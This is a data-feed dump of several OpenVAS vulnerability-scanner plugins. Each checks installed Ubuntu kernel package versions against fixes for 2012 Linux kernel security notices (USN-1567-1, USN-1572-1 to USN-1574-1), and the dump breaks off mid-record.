"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1574_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for linux-lts-backport-natty USN-1574-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A flaw was found in how the Linux kernel passed the replacement session\n keyring to a child process. An unprivileged local user could exploit this\n flaw to cause a denial of service (panic). (CVE-2012-2745)\n\n Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n \n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n \n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1574-1\";\ntag_affected = \"linux-lts-backport-natty on Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1574-1/\");\n script_id(841150);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-22 11:59:18 +0530 (Sat, 22 Sep 2012)\");\n script_cve_id(\"CVE-2012-2745\", \"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"USN\", value: \"1574-1\");\n script_name(\"Ubuntu Update for linux-lts-backport-natty USN-1574-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-generic\", ver:\"2.6.38-16.67~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-generic-pae\", ver:\"2.6.38-16.67~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-server\", ver:\"2.6.38-16.67~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-virtual\", ver:\"2.6.38-16.67~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:58:18", "references": ["http://www.ubuntu.com/usn/usn-1567-1/", "1567-1"], "pluginID": "1361412562310841147", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1567-1", "edition": 5, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-09-17T00:00:00", "title": "Ubuntu Update for linux USN-1567-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3511", "CVE-2012-2745", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2018-08-17T00:00:00", "id": "OPENVAS:1361412562310841147", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841147", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1567_1.nasl 11037 2018-08-17 11:51:16Z cfischer $\n#\n# Ubuntu Update for linux USN-1567-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\n\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1567-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841147\");\n script_version(\"$Revision: 11037 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-17 13:51:16 +0200 (Fri, 17 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-17 16:55:00 +0530 (Mon, 17 Sep 2012)\");\n script_cve_id(\"CVE-2012-2745\", \"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"USN\", value:\"1567-1\");\n script_name(\"Ubuntu Update for linux USN-1567-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU11\\.04\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1567-1\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 11.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"A flaw was found in how the Linux kernel passed the replacement session\n keyring to a child process. An unprivileged local user could exploit this\n flaw to cause a denial of service (panic). (CVE-2012-2745)\n\n Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n\n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n\n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-generic\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-generic-pae\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-omap\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-powerpc\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-powerpc-smp\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-powerpc64-smp\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-server\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-versatile\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-virtual\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:19:52", "references": ["1573-1", "http://www.ubuntu.com/usn/usn-1573-1/"], "pluginID": "841156", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1573-1", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-09-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Ubuntu Update for linux-ec2 USN-1573-1", "type": "openvas", "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3511", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2017-12-01T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=841156", "id": "OPENVAS:841156", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1573_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for linux-ec2 USN-1573-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n\n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n \n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1573-1\";\ntag_affected = \"linux-ec2 on Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1573-1/\");\n script_id(841156);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-22 11:59:38 +0530 (Sat, 22 Sep 2012)\");\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"USN\", value: \"1573-1\");\n script_name(\"Ubuntu Update for linux-ec2 USN-1573-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-348-ec2\", ver:\"2.6.32-348.54\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:20:43", "references": ["http://www.ubuntu.com/usn/usn-1572-1/", "1572-1"], "pluginID": "841155", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1572-1", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-09-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Ubuntu Update for linux USN-1572-1", "type": "openvas", "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3511", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2017-12-01T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=841155", "id": "OPENVAS:841155", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1572_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for linux USN-1572-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n\n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n \n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1572-1\";\ntag_affected = \"linux on Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1572-1/\");\n script_id(841155);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-22 11:59:35 +0530 (Sat, 22 Sep 2012)\");\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"USN\", value: \"1572-1\");\n script_name(\"Ubuntu Update for linux USN-1572-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-386\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-generic\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-generic-pae\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-ia64\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-lpia\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-powerpc\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-powerpc-smp\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-powerpc64-smp\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-preempt\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-server\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-sparc64\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-sparc64-smp\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-versatile\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-virtual\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:58:56", "references": ["http://www.ubuntu.com/usn/usn-1572-1/", "1572-1"], "pluginID": "1361412562310841155", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1572-1", "edition": 5, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-09-22T00:00:00", "title": "Ubuntu Update for linux USN-1572-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3511", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2018-08-17T00:00:00", "id": "OPENVAS:1361412562310841155", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841155", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1572_1.nasl 11037 2018-08-17 11:51:16Z cfischer $\n#\n# Ubuntu Update for linux USN-1572-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\n\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1572-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841155\");\n script_version(\"$Revision: 11037 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-17 13:51:16 +0200 (Fri, 17 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-22 11:59:35 +0530 (Sat, 22 Sep 2012)\");\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"USN\", value:\"1572-1\");\n script_name(\"Ubuntu Update for linux USN-1572-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU10\\.04 LTS\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1572-1\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n\n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n\n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-386\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-generic\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-generic-pae\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-ia64\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-lpia\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-powerpc\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-powerpc-smp\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-powerpc64-smp\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-preempt\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-server\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-sparc64\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-sparc64-smp\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-versatile\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-virtual\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:01:03", "references": ["1573-1", "http://www.ubuntu.com/usn/usn-1573-1/"], "pluginID": "1361412562310841156", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1573-1", "edition": 5, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-09-22T00:00:00", "title": "Ubuntu Update for linux-ec2 USN-1573-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": 